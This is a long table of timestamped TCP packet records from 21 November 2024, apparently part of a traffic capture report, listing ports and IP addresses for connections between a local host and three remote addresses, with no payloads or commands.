                                                                                                                                                                      Nov 21, 2024 06:23:39.997612000 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.997788906 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.998687029 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.998733997 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.040339947 CET49769443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:40.104079962 CET4434976813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.104171038 CET4434976813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.104295969 CET49768443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:40.170643091 CET49769443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:40.170676947 CET4434976913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.173098087 CET49769443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:40.173109055 CET4434976913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.212663889 CET49768443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:40.212692022 CET4434976813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.212728024 CET49768443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:40.212738037 CET4434976813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.217427015 CET49773443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:40.217468023 CET4434977313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.217577934 CET49773443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:40.218137980 CET49773443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:40.218153954 CET4434977313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.472234011 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.499031067 CET4434976913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.499104977 CET4434976913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.499161959 CET49769443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:40.499454975 CET49769443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:40.499476910 CET4434976913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.499488115 CET49769443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:40.499494076 CET4434976913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.503177881 CET49774443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:40.503228903 CET4434977413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.503312111 CET49774443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:40.503535032 CET49774443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:40.503550053 CET4434977413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.524702072 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.628767014 CET49775443192.168.2.640.113.110.67
                                                                                                                                                                      Nov 21, 2024 06:23:40.628818035 CET4434977540.113.110.67192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.628901005 CET49775443192.168.2.640.113.110.67
                                                                                                                                                                      Nov 21, 2024 06:23:40.629909039 CET49775443192.168.2.640.113.110.67
                                                                                                                                                                      Nov 21, 2024 06:23:40.629925013 CET4434977540.113.110.67192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.698337078 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.891959906 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.891987085 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.891999006 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892010927 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892021894 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892036915 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892044067 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.892050028 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892060995 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892124891 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.892153978 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892165899 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892177105 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892189026 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892199993 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892209053 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.892220020 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892230034 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892235041 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.892241001 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892251968 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892261982 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892262936 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.892272949 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892282963 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892287970 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892293930 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892298937 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.892299891 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892306089 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892328024 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892342091 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892350912 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892352104 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.892363071 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892373085 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892375946 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.892390013 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892400026 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892406940 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.892410994 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892421007 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892431021 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.892432928 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892445087 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892456055 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892466068 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892476082 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892486095 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892487049 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.892497063 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892507076 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892520905 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892529964 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.892541885 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892553091 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892563105 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892574072 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892574072 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.892584085 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892594099 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892601967 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.892605066 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892615080 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892626047 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892636061 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.892637968 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892647028 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892657042 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892663956 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.892668009 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892688036 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892697096 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.892699957 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892710924 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892720938 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892724037 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.892731905 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892744064 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892746925 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.892755032 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892765999 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892775059 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892782927 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.892786026 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892796040 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892807007 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892812014 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.892817020 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892827034 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892838001 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892846107 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.892849922 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892860889 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892869949 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.892870903 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892882109 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892890930 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.892893076 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892903090 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892910004 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.892915964 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892935038 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892935038 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.892945051 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892956972 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892976046 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892987013 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.892995119 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.892998934 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893008947 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893019915 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893029928 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893033028 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.893044949 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893054962 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893062115 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.893065929 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893076897 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893089056 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893099070 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893109083 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893112898 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.893120050 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893124104 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.893131971 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893141985 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893152952 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893162966 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893172026 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.893198967 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.893383026 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893394947 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893429041 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893429995 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.893440962 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893450975 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893477917 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.893631935 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893644094 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893652916 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893665075 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893672943 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.893675089 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893687010 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893697023 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893707037 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893713951 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.893718004 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893728971 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893737078 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.893738985 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893750906 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893760920 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893769026 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.893771887 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893789053 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893795967 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.893800020 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893812895 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893825054 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893841028 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893845081 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.893851995 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893862009 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893872023 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893883944 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893894911 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893899918 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.893904924 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893923998 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.893950939 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.893958092 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893975973 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.893989086 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894001007 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894011021 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894013882 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.894021034 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894032955 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894040108 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.894042015 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894052982 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894062996 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894067049 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.894073009 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894084930 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894094944 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.894094944 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894104958 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894114971 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894118071 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.894125938 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894136906 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894143105 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.894146919 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894157887 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894169092 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894167900 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.894192934 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.894216061 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.894397974 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894409895 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894448042 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.894541979 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894553900 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894567966 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894579887 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894591093 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894599915 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.894602060 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894612074 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894622087 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894623995 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.894646883 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894648075 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.894658089 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894668102 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894670010 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.894704103 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894711971 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.894716024 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894726038 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894737005 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894746065 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894747019 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.894757032 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894767046 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894778013 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.894797087 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894800901 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.894808054 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894819021 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894829035 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894840002 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894843102 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.894850016 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894861937 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894862890 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.894872904 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894884109 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894886971 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.894895077 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894916058 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.894917011 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894928932 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894939899 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.894939899 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894951105 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.894985914 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.895018101 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:40.895071030 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:40.895085096 CET8049762185.215.113.16192.168.2.6
